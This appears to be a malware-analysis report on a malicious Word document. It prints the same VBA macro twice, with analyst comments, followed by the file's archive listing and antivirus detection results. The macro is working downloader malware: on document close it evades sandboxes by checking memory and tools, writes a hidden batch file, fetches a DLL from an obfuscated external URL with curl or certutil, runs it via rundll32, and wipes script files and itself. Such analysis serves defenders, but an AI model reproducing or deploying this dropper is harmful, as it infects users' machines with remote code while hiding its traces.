
Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Word document event handler (named like Word's Document_Close event, so it
' runs when the document is closed). Acts as the gate stage: writes a run-once
' marker file, applies a memory-size check as an anti-analysis heuristic,
' enumerates running processes, and only then calls erjan, which writes and
' runs the batch-file downloader. No parameters, no return value; every
' runtime error is swallowed by On Error Resume Next, so failures are silent.
Sub Document_close()
On Error Resume Next
Set WshShell = CreateObject("Wscript.Shell")
' %localappdata% is expanded via WScript.Shell and used as the marker-file directory.
temppath = WshShell.ExpandEnvironmentStrings("%localappdata%")
Set fso = CreateObject("Scripting.FileSystemObject")
' Run-once marker: if %localappdata%\UjdUhsbsjfU.txt already exists, End
' terminates the whole macro. The Else branch is intentionally empty.
' Forensic artifact: presence of this file indicates the macro has executed.
If fso.FileExists(temppath & "\UjdUhsbsjfU.txt") Then
End
Else
End If
' First run: create the marker so subsequent closes do nothing.
fso.CreateTextFile (temppath & "\UjdUhsbsjfU.txt")
' Redundant re-arming of error suppression (already in effect since the top).
On Error Resume Next
On Error Resume Next
strComputer = "."
' WMI query against the local machine ("."); flag 48 is
' wbemFlagReturnImmediately (16) + wbemFlagForwardOnly (32).
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem", , 48)
For Each objitem In colItems
    memory = objitem.TotalVisibleMemorySize
   users = objitem.RegisteredUser
   ' Anti-sandbox heuristic: TotalVisibleMemorySize is reported in kilobytes,
   ' so 5000000 is roughly 4.8 GiB; a host with less RAM is counted in qtyall
   ' and treated as an analysis environment below. `users` is read but never used.
   If memory < 5000000 Then
qtyall = qtyall + 1
Else
End If
Next
On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
' Second WMI query: enumerate all running processes.
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objitem In colItems
    ' Process names are compared against analysis/VM tooling (tcpdump, wireshark,
    ' pythonw, Vmtoolsd). The literals are split with "+" so the full names never
    ' appear as contiguous strings in the module (static-signature evasion).
    If objitem.Name = "tcpdum" + "p.exe" Then
       Item = Item + "_tcp" + "dump.e" + "xe"
End If
   If objitem.Name = "wireshark.ex" + "e" Then
       Item = Item + "_wire" + "shark.exe"
End If

   If objitem.Name = "pythonw.e" + "xe" Then
       Item = Item + "_python" + "w.exe"
End If
   If objitem.Name = "Vmto" + "olsd.e" + "xe" Then
       Item = Item + "_Vmtool" + "sd.exe"
End If
Next
' NOTE(analysis): Item is accumulated above but never read afterwards, so the
' process check has no effect on control flow; only the memory count (qtyall)
' decides whether the payload stage runs.
If qtyall > 0 Then
End
Else
' Hand off to the batch-file dropper/downloader stage.
Call erjan
End If
End Sub

' Second stage: assembles a Windows batch script in PfleIkmImw, writes it to a
' temp-named .bat under the current user's local Temp directory, and runs it
' hidden (window style 0), waiting for it to finish. The batch script downloads
' a DLL into a "load" folder under the user's IE History directory, executes it
' with rundll32, then deletes the folder, every *.vbs/*.bat under %temp%, and
' itself. No parameters, no return value. The variables memo/ise/laz/fre are
' interleaved with the batch-building lines but only combine into the .bat
' path at the end (opossujm).
Sub erjan()
PfleIkmImw = PfleIkmImw + "@echo off" & vbCrLf
' serv = the user's local Temp dir; used by the :delete section below.
PfleIkmImw = PfleIkmImw + "set ""serv=C:\Users\%username%\AppData\Local\Temp""" & vbCrLf
' Presence of the built-in curl.exe decides which download path is taken.
PfleIkmImw = PfleIkmImw + "set ""curl=C:\Windows\System32\curl.exe""" & vbCrLf
' memo = "C:\Users\" (Chr(58) = ":", Chr(92) = "\"); first piece of the .bat path.
memo = "C" & Chr(58) & "\Users" & Chr(92)
' Staging directory: a "load" subfolder inside the user's IE History folder.
PfleIkmImw = PfleIkmImw + "set ""fold=C:\Users\%username%\AppData\Local\Microsoft\Windows\History""" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "mkdir load" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd load " & vbCrLf
' ise = current Windows user name (WScript.Network); second piece of the .bat path.
ise = CreateObject("Wscript.Network").UserName
PfleIkmImw = PfleIkmImw + "set ""fold2=C:\Users\%username%\AppData\Local\Microsoft\Windows\History\load""" & vbCrLf
' Payload file name: %random% digits around "ji", .dll extension, inside %fold2%.
PfleIkmImw = PfleIkmImw + "set ""namex=%fold2%\%random%ji%random%.dll""" & vbCrLf
' namex2 is defined but never referenced anywhere in the script.
PfleIkmImw = PfleIkmImw + "set ""namex2=%fold2%\%random%jis%random%.dll"" " & vbCrLf
PfleIkmImw = PfleIkmImw + "if exist %curl% (goto curlload) else (goto bitsadmin)" & vbCrLf
PfleIkmImw = PfleIkmImw + ":curlload" & vbCrLf
' laz = "\appdata\local\"; third piece of the .bat path.
laz = Chr(92) & "appdata" & Chr(92) & "local\"
' Download command. Individual characters of the switches and of the URL are
' sliced out of environment variables (%VAR:~start,len%) so neither the full
' URL nor the full switch names appear as contiguous text; only the literal
' fragments (http, ://tv-m, rket.onlin, /simp, e., ng) are visible here.
' Resolve the slices on a reference Windows host to recover the exact URL.
' --ssl-no-revoke disables certificate revocation checking for the download.
PfleIkmImw = PfleIkmImw + "curl%CommonProgramW6432:~23,1%--sil%TEMP:~-3,1%n%APPDATA:~-10,-9% http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng --output ""%namex%"" --ssl-no-revoke" & vbCrLf
' Appears to be rundll32.exe (one character is an env-var slice) loading the
' downloaded DLL and calling its export "ducks". Detection point: rundll32
' loading a .dll from the History\load folder.
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
' Fallback when curl.exe is absent. Despite the :bitsadmin label, the visible
' switches (-urlcache, -split -f) are those of certutil.exe; the executable
' name itself is built entirely from environment-variable slices. Same URL
' fragments as the curl branch.
PfleIkmImw = PfleIkmImw + ":bitsadmin" & vbCrLf
PfleIkmImw = PfleIkmImw + "%PUBLIC:~-1%%PUBLIC:~5,-9%%TMP:~6,1%tut%APPDATA:~-3,1%l.exe -urlcache%CommonProgramW6432:~-6,1%-split -f http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng ""%namex%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
' fre = "temp\"; last piece of the .bat path (split literal, same evasion as above).
fre = "tem" + "p\"
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
' Cleanup: remove the staging folder, then recursively delete every *.vbs and
' *.bat under the user's Temp tree (not only this script's own files), and
' finally truncate and delete this batch file (%~f0 = the running script's
' own full path).
PfleIkmImw = PfleIkmImw + ":delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold2%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "rd /s /q ""%fold2%"" 2>NUL" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%serv%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.vbs" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.bat" & vbCrLf
PfleIkmImw = PfleIkmImw + "echo.>""%~f0""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del ""%~f0"" /q" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
' Directory for the .bat: "C:\Users\<user>\appdata\local\temp\".
opossujm = memo + ise + laz + fre
Set Oalfgenwjl = CreateObject("Scripting.FileSystemObject")
' Random temporary file name from FSO with a ".bat" extension appended.
nameeeee = opossujm & Oalfgenwjl.GetTempName & ".bat"
Set stex = Oalfgenwjl.CreateTextFile(nameeeee, True)
stex.writeline PfleIkmImw
stex.Close
Set opaluba = CreateObject("wscript.shell")
' Run the batch with a hidden window (0) and block until it returns (True).
opaluba.Run Chr(34) & nameeeee & Chr(34), 0, True
End Sub




                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Word document event handler (named like Word's Document_Close event, so it
' runs when the document is closed). Acts as the gate stage: writes a run-once
' marker file, applies a memory-size check as an anti-analysis heuristic,
' enumerates running processes, and only then calls erjan, which writes and
' runs the batch-file downloader. No parameters, no return value; every
' runtime error is swallowed by On Error Resume Next, so failures are silent.
Sub Document_close()
On Error Resume Next
Set WshShell = CreateObject("Wscript.Shell")
' %localappdata% is expanded via WScript.Shell and used as the marker-file directory.
temppath = WshShell.ExpandEnvironmentStrings("%localappdata%")
Set fso = CreateObject("Scripting.FileSystemObject")
' Run-once marker: if %localappdata%\UjdUhsbsjfU.txt already exists, End
' terminates the whole macro. The Else branch is intentionally empty.
' Forensic artifact: presence of this file indicates the macro has executed.
If fso.FileExists(temppath & "\UjdUhsbsjfU.txt") Then
End
Else
End If
' First run: create the marker so subsequent closes do nothing.
fso.CreateTextFile (temppath & "\UjdUhsbsjfU.txt")
' Redundant re-arming of error suppression (already in effect since the top).
On Error Resume Next
On Error Resume Next
strComputer = "."
' WMI query against the local machine ("."); flag 48 is
' wbemFlagReturnImmediately (16) + wbemFlagForwardOnly (32).
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem", , 48)
For Each objitem In colItems
    memory = objitem.TotalVisibleMemorySize
   users = objitem.RegisteredUser
   ' Anti-sandbox heuristic: TotalVisibleMemorySize is reported in kilobytes,
   ' so 5000000 is roughly 4.8 GiB; a host with less RAM is counted in qtyall
   ' and treated as an analysis environment below. `users` is read but never used.
   If memory < 5000000 Then
qtyall = qtyall + 1
Else
End If
Next
On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
' Second WMI query: enumerate all running processes.
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objitem In colItems
    ' Process names are compared against analysis/VM tooling (tcpdump, wireshark,
    ' pythonw, Vmtoolsd). The literals are split with "+" so the full names never
    ' appear as contiguous strings in the module (static-signature evasion).
    If objitem.Name = "tcpdum" + "p.exe" Then
       Item = Item + "_tcp" + "dump.e" + "xe"
End If
   If objitem.Name = "wireshark.ex" + "e" Then
       Item = Item + "_wire" + "shark.exe"
End If

   If objitem.Name = "pythonw.e" + "xe" Then
       Item = Item + "_python" + "w.exe"
End If
   If objitem.Name = "Vmto" + "olsd.e" + "xe" Then
       Item = Item + "_Vmtool" + "sd.exe"
End If
Next
' NOTE(analysis): Item is accumulated above but never read afterwards, so the
' process check has no effect on control flow; only the memory count (qtyall)
' decides whether the payload stage runs.
If qtyall > 0 Then
End
Else
' Hand off to the batch-file dropper/downloader stage.
Call erjan
End If
End Sub

' Second stage: assembles a Windows batch script in PfleIkmImw, writes it to a
' temp-named .bat under the current user's local Temp directory, and runs it
' hidden (window style 0), waiting for it to finish. The batch script downloads
' a DLL into a "load" folder under the user's IE History directory, executes it
' with rundll32, then deletes the folder, every *.vbs/*.bat under %temp%, and
' itself. No parameters, no return value. The variables memo/ise/laz/fre are
' interleaved with the batch-building lines but only combine into the .bat
' path at the end (opossujm).
Sub erjan()
PfleIkmImw = PfleIkmImw + "@echo off" & vbCrLf
' serv = the user's local Temp dir; used by the :delete section below.
PfleIkmImw = PfleIkmImw + "set ""serv=C:\Users\%username%\AppData\Local\Temp""" & vbCrLf
' Presence of the built-in curl.exe decides which download path is taken.
PfleIkmImw = PfleIkmImw + "set ""curl=C:\Windows\System32\curl.exe""" & vbCrLf
' memo = "C:\Users\" (Chr(58) = ":", Chr(92) = "\"); first piece of the .bat path.
memo = "C" & Chr(58) & "\Users" & Chr(92)
' Staging directory: a "load" subfolder inside the user's IE History folder.
PfleIkmImw = PfleIkmImw + "set ""fold=C:\Users\%username%\AppData\Local\Microsoft\Windows\History""" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "mkdir load" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd load " & vbCrLf
' ise = current Windows user name (WScript.Network); second piece of the .bat path.
ise = CreateObject("Wscript.Network").UserName
PfleIkmImw = PfleIkmImw + "set ""fold2=C:\Users\%username%\AppData\Local\Microsoft\Windows\History\load""" & vbCrLf
' Payload file name: %random% digits around "ji", .dll extension, inside %fold2%.
PfleIkmImw = PfleIkmImw + "set ""namex=%fold2%\%random%ji%random%.dll""" & vbCrLf
' namex2 is defined but never referenced anywhere in the script.
PfleIkmImw = PfleIkmImw + "set ""namex2=%fold2%\%random%jis%random%.dll"" " & vbCrLf
PfleIkmImw = PfleIkmImw + "if exist %curl% (goto curlload) else (goto bitsadmin)" & vbCrLf
PfleIkmImw = PfleIkmImw + ":curlload" & vbCrLf
' laz = "\appdata\local\"; third piece of the .bat path.
laz = Chr(92) & "appdata" & Chr(92) & "local\"
' Download command. Individual characters of the switches and of the URL are
' sliced out of environment variables (%VAR:~start,len%) so neither the full
' URL nor the full switch names appear as contiguous text; only the literal
' fragments (http, ://tv-m, rket.onlin, /simp, e., ng) are visible here.
' Resolve the slices on a reference Windows host to recover the exact URL.
' --ssl-no-revoke disables certificate revocation checking for the download.
PfleIkmImw = PfleIkmImw + "curl%CommonProgramW6432:~23,1%--sil%TEMP:~-3,1%n%APPDATA:~-10,-9% http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng --output ""%namex%"" --ssl-no-revoke" & vbCrLf
' Appears to be rundll32.exe (one character is an env-var slice) loading the
' downloaded DLL and calling its export "ducks". Detection point: rundll32
' loading a .dll from the History\load folder.
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
' Fallback when curl.exe is absent. Despite the :bitsadmin label, the visible
' switches (-urlcache, -split -f) are those of certutil.exe; the executable
' name itself is built entirely from environment-variable slices. Same URL
' fragments as the curl branch.
PfleIkmImw = PfleIkmImw + ":bitsadmin" & vbCrLf
PfleIkmImw = PfleIkmImw + "%PUBLIC:~-1%%PUBLIC:~5,-9%%TMP:~6,1%tut%APPDATA:~-3,1%l.exe -urlcache%CommonProgramW6432:~-6,1%-split -f http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng ""%namex%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "r%PUBLIC:~-5,1%ndll32.exe ""%namex%"", ducks" & vbCrLf
' fre = "temp\"; last piece of the .bat path (split literal, same evasion as above).
fre = "tem" + "p\"
PfleIkmImw = PfleIkmImw + "goto delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
' Cleanup: remove the staging folder, then recursively delete every *.vbs and
' *.bat under the user's Temp tree (not only this script's own files), and
' finally truncate and delete this batch file (%~f0 = the running script's
' own full path).
PfleIkmImw = PfleIkmImw + ":delete" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%fold2%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "rd /s /q ""%fold2%"" 2>NUL" & vbCrLf
PfleIkmImw = PfleIkmImw + "cd ""%serv%""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.vbs" & vbCrLf
PfleIkmImw = PfleIkmImw + "del /S /F /Q *.bat" & vbCrLf
PfleIkmImw = PfleIkmImw + "echo.>""%~f0""" & vbCrLf
PfleIkmImw = PfleIkmImw + "del ""%~f0"" /q" & vbCrLf
PfleIkmImw = PfleIkmImw + "" & vbCrLf
' Directory for the .bat: "C:\Users\<user>\appdata\local\temp\".
opossujm = memo + ise + laz + fre
Set Oalfgenwjl = CreateObject("Scripting.FileSystemObject")
' Random temporary file name from FSO with a ".bat" extension appended.
nameeeee = opossujm & Oalfgenwjl.GetTempName & ".bat"
Set stex = Oalfgenwjl.CreateTextFile(nameeeee, True)
stex.writeline PfleIkmImw
stex.Close
Set opaluba = CreateObject("wscript.shell")
' Run the batch with a hidden window (0) and block until it returns (True).
opaluba.Run Chr(34) & nameeeee & Chr(34), 0, True
End Sub




                                    
[Content_Types].xml
/L[E'9
_rels/.rels
word/document.xml
4H'>Lp
word/_rels/document.xml.rels
X=c+(\
word/vbaProject.bin
Qwg2%hn
KI1_!Y
k4#JKe6
s7<=?v
Yi[aaa+{
J#/<W0
<k-aSL
word/theme/theme1.xml
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
ij;7hmk?
fixNq*
word/settings.xml
z*T}vbC
word/styles.xml
/oR&dD
v25I%D$
eR*Etlm
,5DuIm
word/webSettings.xml
]?cv0$G
word/fontTable.xml
V}A>NH
Q]Qi4/
docProps/core.xml
Yu~Vr[p
docProps/app.xml
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/vbaProject.binPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.Emooo.4!c
Elastic malicious (high confidence)
DrWeb modification of W97M.Suspicious.1
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Malware.Generic-VBA.Save.Obfuscated
K7AntiVirus Clean
BitDefender VB.Heur.EmoooDldr.2.D21F479B.Gen
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
Alibaba TrojanDownloader:VBA/Obfuscation.A
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB.Heur.EmoooDldr.2.D21F479B.Gen
Rising Clean
Ad-Aware VB.Heur.EmoooDldr.2.D21F479B.Gen
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.mc
FireEye VB.Heur.EmoooDldr.2.D21F479B.Gen
Emsisoft VB.Heur.EmoooDldr.2.D21F479B.Gen (B)
SentinelOne Static AI - Suspicious OPENXML
Avast-Mobile Clean
Jiangmin Clean
Avira Clean
MAX malware (ai score=83)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit VB.Heur.EmoooDldr.2.D21F479B.Gen
ViRobot Clean
ZoneAlarm Clean
GData VB.Heur.EmoooDldr.2.D21F479B.Gen
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/WOX.Dropper.Gen
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
No IRMA results available.